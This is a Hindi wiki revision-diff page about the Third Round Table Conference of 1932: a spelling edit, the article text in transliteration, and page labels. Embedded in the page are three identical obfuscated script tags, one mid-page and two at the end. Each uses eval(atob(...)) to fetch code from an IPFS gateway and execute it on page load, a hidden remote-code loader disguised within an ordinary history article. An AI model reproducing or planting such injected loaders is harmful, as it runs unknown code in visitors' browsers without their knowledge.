Difference between revisions of "गोलमेज़ सम्मेलन तृतीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''तृतीय गोलमेज सम्मेलन''' [[17 नवम्बर]], [[1932]] ई. को आयोजित किया गया। इस सम्मेलन में कुल 46 प्रतिनिधियों ने हिस्सा लिया। यह सम्मेलन बिना किसी निर्णय के ही समाप्त हुआ।
+
'''तृतीय गोलमेज़ सम्मेलन''' [[17 नवम्बर]], [[1932]] ई. को आयोजित किया गया। इस सम्मेलन में कुल 46 प्रतिनिधियों ने हिस्सा लिया। यह सम्मेलन बिना किसी निर्णय के ही समाप्त हुआ।
 
+
*'तृतीय गोलमेज़ सम्मेलन' में [[कांग्रेस]] के किसी प्रतिनिधि ने भाग नहीं लिया।
*'तृतीय गोलमेज सम्मेलन' में [[कांग्रेस]] के किसी प्रतिनिधि ने भाग नहीं लिया।
+
*भारत सचिव सर सैमुअल होर इस 'गोलमेज़ सम्मेलन' का विरोधी था।
*भारत सचिव सर सैमुअल होर इस 'गोलमेज सम्मेलन' का विरोधी था।
 
 
*इस सम्मेलन में भारतीय संवैधानिक प्रगति के कुछ सिद्धान्तों पर सभी लोग सहमत हो गए, जिन्हें एक श्वेतपत्र के रूप में ब्रिटिश संसद के दोनों सदनों की संयुक्त प्रवर समिति के सम्मुख रखा गया।
 
*इस सम्मेलन में भारतीय संवैधानिक प्रगति के कुछ सिद्धान्तों पर सभी लोग सहमत हो गए, जिन्हें एक श्वेतपत्र के रूप में ब्रिटिश संसद के दोनों सदनों की संयुक्त प्रवर समिति के सम्मुख रखा गया।
 
*यही श्वेतपत्र आगे चलकर [[1933]] ई. के 'गवर्नमेंट ऑफ़ इंडिया एक्ट' (भारतीय शासन विधान) का आधार बना।
 
*यही श्वेतपत्र आगे चलकर [[1933]] ई. के 'गवर्नमेंट ऑफ़ इंडिया एक्ट' (भारतीय शासन विधान) का आधार बना।

Latest revision as of 12:17, 4 December 2012

tritiy golamez sammelan 17 navambar, 1932 ee. ko ayojit kiya gaya. is sammelan mean kul 46 pratinidhiyoan ne hissa liya. yah sammelan bina kisi nirnay ke hi samapt hua.

  • 'tritiy golamez sammelan' mean kaangres ke kisi pratinidhi ne bhag nahian liya.
  • bharat sachiv sar saimual hor is 'golamez sammelan' ka virodhi tha.
  • is sammelan mean bharatiy sanvaidhanik pragati ke kuchh siddhantoan par sabhi log sahamat ho ge, jinhean ek shvetapatr ke roop mean british sansad ke donoan sadanoan ki sanyukt pravar samiti ke sammukh rakha gaya.
  • yahi shvetapatr age chalakar 1933 ee. ke 'gavarnameant aauf iandiya ekt' (bharatiy shasan vidhan) ka adhar bana.
  • 24 disambar, 1932 ee. ko bina kisi nirnay ke yah sammelan samapt ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>